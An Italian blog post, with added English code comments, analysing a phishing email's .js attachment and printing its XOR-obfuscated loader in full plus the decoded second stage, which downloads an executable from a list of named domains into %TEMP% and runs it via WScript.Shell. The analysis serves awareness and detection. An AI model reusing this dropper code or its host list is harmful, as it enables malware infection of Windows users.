Ricevo da una certa “Gabriella Ferrari” (una volta i nomi erano più esotici) una simpatica e-mail con oggetto “iPhone 6s”, con in allegato uno zip dal nome IMG_8779.zip. Cosa sarà mai? Una foto osé destinata ad altri e che posso sbirciare? Niente di tutto questo: l’e-mail contiene un file di testo con estensione js. Lo apro con Notepad ed ecco il suo contenuto:
var key = ‘RgUfsrM3’;var b = ‘6\x11=?*\x27\x04y=\x10\x12^SOm\x114Qw]~x+F<\x04!\x0f\x1c\x1cmW$\x0f\x0c?&;\x07\x5c% }54(\x0eJ:+&>2=,P4!|F\x08\x7fG\x13rGu\x10\x12\x00mW$\x0f\x0c?&;\x07\x5c% aFNRov\x1c3\x1d#?”cp\x1d*u.63\x01z\x1c \x066!;\x03t\x05(\x07- :\x02c\x01I\x16)>]:C\x7f\x04:\x08\x07\x17#G}\x13=\x03\x1e\x17>\x1c&\x154\x10\x16\x1e`Q>\x082\x01\x16\x00mg\x07 \x07\x27;=\x19v\x1e4{%<?mD%\x10{\x00\x1f\x1d?Z3\x097\x14\x06\x17#Z<\x00{\x05\x1c\x1fmy\x07&\x192<%\x08a\x065\x1c\x27=5\x01v|$\x1a+S?\x0cr\x19$\x1447\x5c\x0e|\x1fG”\x11\x04\x5c\x27R9\x0e8\x04\x1c\x019\x1d”\x0bu2;7\x1bz\x1e+\x14!6$\x08g\x175\x1c(2 \x14{\x1d4\x05/\x273\x01\x1d\x11(\x18F;3\x1dc\x0b”\x004<!\x19|\x02I\x16)>Pc@”\x0b<\x12[Pm\x11{\x5cXlSRm\x13;\x01uN 5\x17p+\x0f\x19\x15+3\x02R1\x01\x13FNOm\x11pNu\x1d~xm\x13rGuFSR8e\x165\x05\x0d!\x16\x05]rZuD]\x175Vp\x5cXlSRm\x13/G0\x0a\x00\x17mH_muFSRm\x13rG 07 \x1dX\x00\x03\x1d\x08SOm\x11|\x171\x00QI@9rGuF\x0eI@9rGuF\x15\x1d?\x13z\x114\x14S3\x05@3?-\x056\x01\x05]rZuVHR\x0c{!\x06\x0d\x1e\x107>{<GiF\x17\x04%j\x0b2\x1c,\x1c\x05\x0a\x07|\x0b0\x08\x14\x06%\x08r&\x1d\x15\x12*5P\x17\x14\x1d\x08XYd\x13)j_FSRm\x13rGu\x10\x12\x00mZ\x11?\x1f(\x094%~<!u[S\x1c(Dr&6\x12\x1a\x04(k\x1d\x05?\x03\x10\x06e\x11\x0546\x14\x1a\x029\x1d\x01\x0f0\x0a\x1fPd\x08_muFSRm\x13rG%\x1f%4%{“\x1d2\x0d5:m\x0er\x0e\x16>9<7u:*; ]75C3\x091#\x1d\x04$A=\x098\x03\x1d\x06\x1eG \x0e;\x01\x00Zo\x16\x06″\x186VPd\x13yGw:/Pm\x18r*4\x12\x1b\x5c?\x5c\x27\x091NB\x17u\x13xG\x18\x07\x07\x1acA3\x091\x09\x1eZd\x1arLu\x13%6\x1fc951.\x1dI@9rGuFSRm\x13\x07\x14\x18\x07\x173\x1dq\x08&\x1b \x19\x08\x13oG3\x07\x1f\x01(\x08_muFSRm\x13rG1\x10\x1b+\x14f\x1b-:\x114Bm\x0er\x090\x11S3.G;\x110><\x10\x27V1\x13}D>!\x15~\x1eU{>>>\x05g\x067wOH\x7fG\x13rGuFSRmW$\x0f\x0c?&;\x07\x5c% eH\x1c\x1c?V3\x03,\x15\x07\x139V1\x0f4\x08\x14\x17m\x0er\x01 
\x08\x10\x06$\x5c<O|F\x08\x7fG\x13rGuFSRm\x13rGu\x0f\x15Re\x07rZhF\x17\x04%j\x0b2\x1c,\x1c\x05\x0a\x03|\x150\x07\x17\x0b\x1eG3\x130FUTm\x01bWu[NR)E:>\x0c3:8″D\x15W{\x15\x07\x139F!Nu\x1d~xm\x13rGuFSRm\x13rGuFSR;R G1\x10\x1b+\x14f\x1b-:\x114Cm\x0er\x090\x11S3.G;\x110><\x10\x27V1\x13}D26\x02w\x10I\x06\x12\x01\x17,^pNnkyRm\x13rGuFSRm\x13rGuFS\x1b+\x13z\x03#\x0e*+\x18z\x18\x08″!B\x5c”C7\x09}O_R)E:>\x0c3:8″D\x15V{\x12\x0a\x02(\x13oGdJS\x16;[\x0b>\x00/9\x1d:tcI”\x14\x1a\x06(\x1b6\x11=?*\x27\x04y=\x10\x12V] (@”\x08;\x15\x160″W+NyFF\x17~\x13nG1\x10\x1b+\x14f\x1b-:\x114Cc@;\x1d0OS\x09@9rGuFSRm\x13rGuFSRm\x13rGuF&\x01\x00R6&\x05$)3\x03u\x01\x0c\x10FNR9A\x27\x02nkyRm\x13rGuFSRm\x13rGuFSRm\x13r\x03#\x0e*+\x18z\x18\x08″!B\x5c=\x5c!\x0e!\x0f\x1c\x1cm\x0erWnkyRm\x13rGuFSRm\x13rGuFSRm\x13r\x03#\x0e*+\x18z\x18\x08″!B\x5c>R$\x02\x01\x095\x1b!Vz\x17,05\x1a\x05C(\x00> ;^m\x01{\x5cXlSRm\x13rGuFSRm\x13rGuFSRm\x13&\x15,F\x08\x7fG\x13rGuFSRm\x13rGuFSRm\x13rGuFSRmZ\x11?\x1f(\x094%~<!{4\x06\x1ceC+1\x13\x0e;\x027T9!\x1dJSCa\x13bNXlSRm\x13rGuFSRm\x13rGuFSRm\x13/G6\x07\x07\x11%\x13z\x03#\x0e*+\x18z\x18\x08″!A[mH/j_FSRm\x13rGuFSRm\x13rGu\x1b~xm\x13rGuFSRm\x13rGuFSR)E:>\x0c3:8″D\x15V{\x05\x1f\x1d>VzNXlSRm\x13rGuFSRm\x13/j_FSRm\x13rGu\x1bH\x7fG\x13rGuFSRmG \x1eu\x1d~xm\x13rGuFSRm\x13rG1\x10\x1b+\x14f\x1b-:\x114Bc\x5c”\x02;NQ5\x08gpKuD\x1b\x069ChHzDSYmW$\x0f\x0c?&;\x07\x5c% a=2:>R\x0a\x1f6#\x00:#nrLuD\x5c\x15(G|\x17=\x16L\x07\x07` \x09/5\x1cOo\x13yG\x18\x07\x07\x1acA3\x091\x09\x1eZd\x13yGw@\x18\x174\x0epG~F\x17\x04%j\x0b2\x1c,\x1c\x05\x0a\x0brLu54(\x0eJ:+&>2=,P4!yF\x15\x13!@7NnkyRm\x13rGuFSRm\x13r\x03#\x0e*+\x18z\x18\x08”!C\x5c>V<\x03}OH\x7fG\x13rGuFSRmNr\x044\x12\x10\x1am\x1b6\x11=?*\x27\x04y=\x10\x12UZR6N_muFSRm\x13rG<\x00SZ\x18@\x1f\x061\x27#0\x17r\x1c!\x06\x0d6[mH_muFSRm\x13rGuFSR/A7\x06>]~xm\x13rGuFSR0\x08_muFSR0\x08_m(]~x)E:>\x0c3:8″D\x15OwDZI@96\x11=?*\x27\x04y=\x10\x12NQT=W4Z<69\x0b\x1e\x5c0\x06\x11DZI’;for (var XHMayGnPPWU5 = “”, XHMayGnPPWU6 = 0, XHMayGnPPWU7 = 0; XHMayGnPPWU6 < b.length; 
XHMayGnPPWU6++) XHMayGnPPWU5 += String.fromCharCode(b.charCodeAt(XHMayGnPPWU6) ^ key.charCodeAt(XHMayGnPPWU7)), XHMayGnPPWU7++, XHMayGnPPWU7 == key.length && (XHMayGnPPWU7 = 0);eval(XHMayGnPPWU5);
Sembra tutto senza senso, ma mettendolo in una forma un po’ più leggibile:
// Stage 1 of the dropper, reformatted from the one-line original: a repeating-key XOR decoder.
// Nothing malicious is visible at this layer; the behaviour lives in the decoded text, which is
// handed straight to eval. This "decode, then eval" shape is the classic marker of an obfuscated
// script attachment and is worth flagging on its own when triaging .js files.
var key = ‘RgUfsrM3’;
// Obfuscated payload as a string literal with \x escapes (truncated here by the author).
var b = ‘6\x11=?*\x27\x04y=\x10\x12^SOm\x114Qw]~x+….’;
// XOR each character code of b with the key character at index XHMayGnPPWU7; the comma
// expression advances the key index and wraps it to 0 when it reaches key.length.
// The decoded string XHMayGnPPWU5 is then executed with eval — i.e. code from untrusted data.
for (var XHMayGnPPWU5 = “”, XHMayGnPPWU6 = 0, XHMayGnPPWU7 = 0; XHMayGnPPWU6 < b.length; XHMayGnPPWU6++)
XHMayGnPPWU5 += String.fromCharCode(b.charCodeAt(XHMayGnPPWU6) ^ key.charCodeAt(XHMayGnPPWU7)), XHMayGnPPWU7++, XHMayGnPPWU7 == key.length && (XHMayGnPPWU7 = 0);eval(XHMayGnPPWU5);
Si vede che è un semplice programma che decodifica la stringa b in base alla chiave key, e poi chiede all’interprete Javascript di eseguire il programma così ottenuto. Cioè:
// Stage-2 global (implicit, no var). The value is concatenated into the &key= query parameter of
// every request made by dvhYYUIJowG below; presumably a campaign tag — not verifiable from here.
dvhYYUIJowG8 = “f6”;
// Stage 2 of the dropper (the text that stage 1 passes to eval), as transcribed in the post;
// the curly quotes are a rendering artefact of the blog, not part of the original script.
// What the code below does: for each host in dvhYYUIJowG4, issue a synchronous HTTP GET to
// /get.php; on a 200 response larger than 5000 bytes, write the body to a randomly named file in
// %TEMP% (extension chosen by the argument) and start it with WScript.Shell.Run; stop after the
// first success. ActiveXObject only exists under a Microsoft scripting host (Windows Script Host,
// or legacy Internet Explorer), so a .js attachment opened by WSH is the intended execution path.
// Detection hints from the visible behaviour: wscript.exe started from a mail/archive attachment,
// an outbound GET to /get.php?...&key=f6..., and a file created in %TEMP% immediately followed by
// a process launched from that same path.
// @param SGZCyhLsXAOacfF  appended verbatim to the request URL; the empty string selects a “.exe”
//        extension for the dropped file, anything else “.pdf” (see the if below).
// Side effects: uVDRPkRdHn, pyVFhHpzgkFH, UsMadAPBZANFSkE and dvhYYUIJowG0 are assigned without
// var and therefore become implicit globals; dvhYYUIJowG8 is read from the global set above.
function dvhYYUIJowG(SGZCyhLsXAOacfF) {
// Second-stage download hosts, space-separated; each is tried in order as “http://” + host + “/get.php”.
var dvhYYUIJowG4 = “ENTHELP.COM HEALINGSPRINGWORKSHOPS.COM/wp-content/themes/travel-blogger TUGRAHOTELS.COM www.florianbruening.com JUALTOWERTRIANGLE.COM MAAKCARD.COM www.jakimbost.pl THEVILLAGEVETERINARYHOSPITAL.COM HAPPYEUROSTOP.COM”.split(” “);
// Pick the extension of the dropped file, then loop over the hosts (kept on one line as in the original).
if (SGZCyhLsXAOacfF == “”) { uVDRPkRdHn = “.exe”; } else { uVDRPkRdHn = “.pdf”; };for (var AHsaXxcEsHn = 0; AHsaXxcEsHn < dvhYYUIJowG4.length; AHsaXxcEsHn++) {
// WScript.Shell is used twice: to expand %TEMP% and to Run the downloaded file.
var iCXJNzFhMnF = new ActiveXObject(“WScript.Shell”);
// Drop path: %TEMP%\<random integer in 0..1e8><extension>.
pyVFhHpzgkFH = iCXJNzFhMnF.ExpandEnvironmentStrings(“%TEMP%”) + “\\” + Math.round(1e8 * Math.random()) + uVDRPkRdHn;
// Becomes true once a payload has been saved; ends the host loop via the break below.
UsMadAPBZANFSkE = false;
dvhYYUIJowG0 = new ActiveXObject(“MSXML2.XMLHTTP”);
// Completion handler; the request below is synchronous, so this effectively runs during send().
dvhYYUIJowG0.onreadystatechange = function() {
if (4 == dvhYYUIJowG0.readyState && 200 == dvhYYUIJowG0.status) {
// Binary stream (type = 1) that receives the raw response body.
var dvhYYUIJowG1 = new ActiveXObject(“ADODB.Stream”);
// Only bodies larger than 5000 bytes are kept — presumably to skip error pages or empty replies (inference).
if (dvhYYUIJowG1.open(), dvhYYUIJowG1.type = 1, dvhYYUIJowG1.write(dvhYYUIJowG0.ResponseBody), 5e3 < dvhYYUIJowG1.size) {
UsMadAPBZANFSkE = true;
dvhYYUIJowG1.position = 0;
// saveToFile option 2 (adSaveCreateOverWrite): write the body to the drop path, overwriting if present.
dvhYYUIJowG1.saveToFile(pyVFhHpzgkFH, 2);
// Launch the dropped file: window style 1 (normal), third argument 0 = do not wait; any failure is ignored.
try {
iCXJNzFhMnF.Run(pyVFhHpzgkFH, 1, 0)
}
catch (dvhYYUIJowG2) {}
}
dvhYYUIJowG1.close()
}
};
// Synchronous GET (last argument false). Math.random() acts as a cache-buster; key carries
// dvhYYUIJowG8 followed by the function argument. Network/ActiveX errors are swallowed so the
// loop simply moves on to the next host.
try {
dvhYYUIJowG0.open(“GET”, “http://” + dvhYYUIJowG4[AHsaXxcEsHn] + “/get.php?uJSrnzSo=” + Math.random() + “&key=” + dvhYYUIJowG8 + SGZCyhLsXAOacfF, false);
dvhYYUIJowG0.send(); }
catch (dvhYYUIJowG3) {}
// Stop at the first host that delivered a payload.
if (UsMadAPBZANFSkE) { break; };
}; //for
}; // end of function. NOTE(review): in the post this line reads “//functiondvhYYUIJowG(“”);”, which
// looks like the comment “//function” followed by a lost line break and a first call dvhYYUIJowG(“”) —
// the call whose empty argument would select the “.exe” branch above. Not verifiable from this rendering.
// Entry call: the non-empty argument selects the “.pdf” extension for the dropped file and is
// appended verbatim to the request URL (it becomes part of the &key= value).
dvhYYUIJowG(“&pdf=iPJySobaD”);
Il simpatico programmino si occupa di collegarsi alle varie URL contenute nella stringa dvhYYUIJowG4 e di scaricare nella cartella temp corrente un file ricevuto da uno di questi siti, per poi eseguirlo. La maggior parte di questi siti risulta segnalata in Chrome come diffusore di malware (in Internet Explorer no), per cui viene bloccata; ma continuando comunque e scaricando manualmente questi programmi, si vede che tentano di farsi passare per aggiornamenti di prodotti leciti, tipo Acrobat Reader. Abbastanza ingegnoso, ma come si vede dallo script finale, l’attacco è destinato a sfruttare alcune caratteristiche di Internet Explorer, e funziona solo se i file Javascript vengono eseguiti come script di sistema.